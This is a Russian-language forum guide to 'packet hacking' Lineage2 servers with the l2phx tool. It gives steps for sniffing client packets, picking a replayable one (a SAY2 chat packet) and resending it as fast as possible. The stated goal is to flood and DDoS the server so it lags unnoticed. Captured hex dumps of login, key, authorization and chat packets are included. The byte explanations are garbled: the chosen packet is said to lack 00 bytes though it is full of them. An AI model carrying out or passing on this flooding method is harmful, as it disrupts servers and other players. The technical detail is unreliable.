Добро пожаловать в руководство о пакет хаке, так чтобы стать хорошим пакет-хакером в Lineage2 продолжайте чтение.
Давайте я рассажу сначала:
1.
Код:
Вопрос: Что такое пакет?
Ответ: Пакет- это данные, которые вы получаете или отправляете на сервер(в нашем случае отослано на Lineage2 Java/Ява Сервер).
К примеру:
Вы хотите купить в магазине вещь, вы выбираете её и нажимаете Окей.
Клиент->Сервер: Отправляются данные, какую вещь хотите купить
Сервер->Клиент: Отправляет данные о том, что вы купили вещь и она у вас в инвентаре.
2.
Атаки флудом эта одна из простых тем, тем что вы отправляете много пакетов или ложных пакетов, чтоб сервер был немного занят и стал меньше "уделять внимания" другим вещам и акцентировал всё внимание на ваши быстро отосланные пакеты(к примеру 50 милисекунд)
3.
Код:
Почему мы будем получать/отправлять пакеты при помощи l2phx?
Причина в том, что l2phx, при помощи XOR и ключа, быстро расшифрует пакет при получении, или быстро зашифрует его при отправке
4.
Код:
Почему л2пх не видит пользовательской информации при логине?
Просто л2пх рассчитан на XOR и ключи, а пользовательская информация передаётся через RSA шифрование, и если нформация там есть, он всё равно не расшифрует её.
Как сделать, чтоб сервер достаточно лагало:
1. Запустить L2phx
2. Запустить Lineage2
3. Снифферить пакеты и отключить отправку пакетов с клиента в l2phx
4. Найти из полученых пакет, который не будет обнаружен сервером и нормально отсылался
5. Открыть некоторые окна(макро, communityboard, инвентарь, кланов, навыков)
6. Получить все пакеты от открытия окон и от логаута(возможно это будет тяжело сделать)
7.Если вы получите пакеты, выглядящие следующим образом:
Код:
Пакет логина в Interlude (нормальный пакет)
00 EA 02 00 00 09 07 54 56 03 09 0B 01 07 02 54 54 56 07 00 02 55 56 00 51 00 53 57 04 07 55 08 54 01 07 01 53 00 56 55 56 01 06 05 04 51 03 08 51 08 51 56 04 54 06 55 08 02 09 51 56 01 53 06 55 04 53 00 56 56 53 01 09 02 09 01 51 54 51 09 55 56 09 03 04 07 05 55 04 06 55 04 06 09 04 51 01 08 08 06 05 52 06 04 01 07 54 03 06 52 55 06 55 55 51 01 02 04 54 03 55 54 01 57 51 55 05 52 05 54 07 51 51 55 07 02 53 53 00 52 05 52 07 01 54 00 03 05 05 08 06 05 05 06 03 00 0D 08 01 07 09 03 51 03 07 53 09 51 06 07 54 0A 50 56 02 52 04 05 55 51 02 53 00 08 54 04 52 56 06 02 09 00 08 03 53 56 01 05 00 55 06 08 56 04 0D 06 07 52 06 07 04 0A 06 01 04 54 04 00 05 02 04 54 00 09 52 53 05 04 01 04 05 05 01 52 51 52 0D 06 51 08 09 54 53 00 0D 01 02 03 54 53 01 05 03 08 56 54 07 02 54 0B 06 DC 4F 61 4F
Код:
Ключ
00 01 80 B4 C9 0F 43 3D 67 BA C8 27 93 01 A1 6C 31 97 01 00 00 00 01 00 00 00
Код:
Авторизация Логина
08 64 00 72 00 61 00 67 00 6F 00 6E 00 63 00 68 00 65 00 61 00 74 00 65 00 72 00 73 00 00 00 A5 D9 9D 1A 73 9C C5 E5 B0 5D 06 06 9E A0 E2 9C 01 00 00 00
Код:
Выбор Чара (плохой пакет, не возможно заного отправить)
0D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Код:
Вход в мир (не возможно отослать заного)
03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 C9 BC F2 A7 66 5A 0B 98 36 A5 BD 89 ED 7F E4 D7 6B 49 E2 9F EF 76 EB CE A3 FA F4 BF 0C 64 A3 B4 DB 4D BF 9E 69 78 FB B3 B3 4C 44 27 5A 8F 59 CE 44 CB D2 69 C9 A3 62 67 C6 5D 65 49 85 9E C0 AA 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
8.Мы пытаемся найти пакет, который возможно будет заного отослать.
9.Прежде я объясню, что пакет содержит много байт:
00 = 1 быйт
00 00 = 2 байта
A3 FA F4 = 3 байта
0C 64 A3 B4 = 4 байта
И если пакет содержит много 00, то это не самый лучший пакет для флуда/ддоса
Поэтому нам нужно найти хороший и не защищены пакет и отправить обратно.
Поиск пакета иногда бывает очень сложно, но иногда его нет.
Так что я постараюсь найти действительны пакет отправить обратно на сервер, чтобы ддос атака сделала лаги как в аду и незаметно.
Теперь запустим снова клиентских пакетов.
первый рабочий пакет, который отсылается в оффлайн игроку, которого нет.
Код:
38 64 00 64 00 67 00 66 00 67 00 66 00 64 00 00 00 02 00 00 00 64 00 73 00 66 00 73 00 64 00 66 00 73 00 64 00 00 00
Теперь надо его отправить так быстро как возможно.
Почему я его решил отправить на сервер?
Потому,что у него нет 00 байтов.
читаем следующее
Информация о пакете
38 64 <-- Пакет функция (SAY2)
00 64 <-- Данные
00 67 <-- Данные
00 66 <-- Данные
00 67 <-- Данные
00 66 <-- Данные
00 64 <-- Данные
00 00 <-- Данные
00 02 <-- Данные
00 00 <-- Данные
00 64 <-- Данные
00 73 <-- Данные
00 66 <-- Данные
00 73 <-- Данные
00 64 <-- Данные
00 66 <-- Данные
00 73 <-- Данные
00 64 <-- Данные
00 00 <<--- первые 00 00 байтов
00 <-- Конец пакета